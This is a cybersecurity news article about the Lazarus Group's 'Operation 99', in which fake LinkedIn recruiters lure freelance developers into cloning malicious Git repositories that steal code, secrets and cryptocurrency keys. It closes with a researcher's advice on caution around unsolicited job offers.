The notorious Lazarus Group, a North Korean state-sponsored Advanced Persistent Threat (APT), has once again shifted its focus to software developers, exploiting recruitment schemes on popular job platforms. In this case, the group is exploiting LinkedIn, posting fraudulent job opportunities aimed at freelance developers.
Their goal? To trick victims into cloning malicious Git repositories filled with malware designed to steal source code, cryptocurrency, and other valuable data.
Dubbed Operation 99, the attack was identified on January 9 by the SecurityScorecard STRIKE team. According to their report, the attackers masquerade as recruiters offering enticing project tests or code reviews. Once developers interact, they are directed to clone malicious repositories, triggering connections to a command-and-control (C2) server. This process unleashes a series of data-exfiltration tools.
The campaign deploys a variety of cross-platform payloads targeting Windows, macOS, and Linux systems. Lazarus uses modular malware components that adapt to specific environments. These components—such as Main99, Payload 99/73, brow99/73, and MCLIP—execute tasks like keylogging, clipboard monitoring, browser credential theft, and exfiltrating sensitive files from development environments.
The malware not only extracts source code, configuration files, and application secrets but also focuses on cryptocurrency-related assets like wallet keys and mnemonics. These elements are essential for direct financial theft, a known objective of the Lazarus Group to fund North Korea's regime.
This campaign poses a dual threat, targeting not only individual developers but also the wider ecosystems and projects they contribute to. By embedding malware into development workflows, Lazarus aims to compromise entire systems and organisations.
This attack strategy isn’t new for Lazarus. The group has a history of targeting software developers, with campaigns like Operation Dream Job in 2021, where fake job offers were sent to specific targets, delivering Trojan malware. Another notable campaign, DEV#POPPER, focused on data theft by luring developers with false job opportunities.
In one infamous case, North Korean operatives infiltrated a cyber security firm, KnowBe4, by convincing them to hire a hacker under the guise of a legitimate candidate. Incidents like these show just how effective these campaigns can be.
While efforts have been made to disrupt North Korea’s cyber operations, including a U.S. Department of Justice crackdown in May that indicted several individuals involved in creating fake freelancer identities, Lazarus continues to adapt and evolve its methods.
Operation 99 marks a significant escalation in the group’s sophistication. According to Ryan Sherstobitoff, Senior Vice President of Threat Research and Intelligence at SecurityScorecard, Lazarus now employs AI-generated profiles that appear authentic and highly credible.
"By presenting complete and convincing profiles, they create the illusion of legitimate job opportunities," Sherstobitoff explained. In some instances, Lazarus even compromises existing LinkedIn accounts to enhance their credibility.
The group has also adopted advanced obfuscation and encryption techniques, making their activities harder to detect and analyse.
As threat actors like Lazarus advance with their tactics, the importance of cyber security awareness becomes paramount. Sherstobitoff emphasised that combating such campaigns requires reinforcing education around social engineering and adhering to basic cyber security principles.
"Always approach job offers or opportunities with skepticism, especially if they seem too good to be true," he advised. He also warned against downloading files, cloning repositories, or engaging with unfamiliar software at the behest of recruiters—particularly when contacted through platforms like LinkedIn.
This latest campaign highlights the growing sophistication of Lazarus Group’s operations and their ability to exploit trust through advanced social engineering. Developers and organisations alike must remain cautious, exercising caution when interacting with unknown recruiters and strengthening awareness within their workforce around potential threats.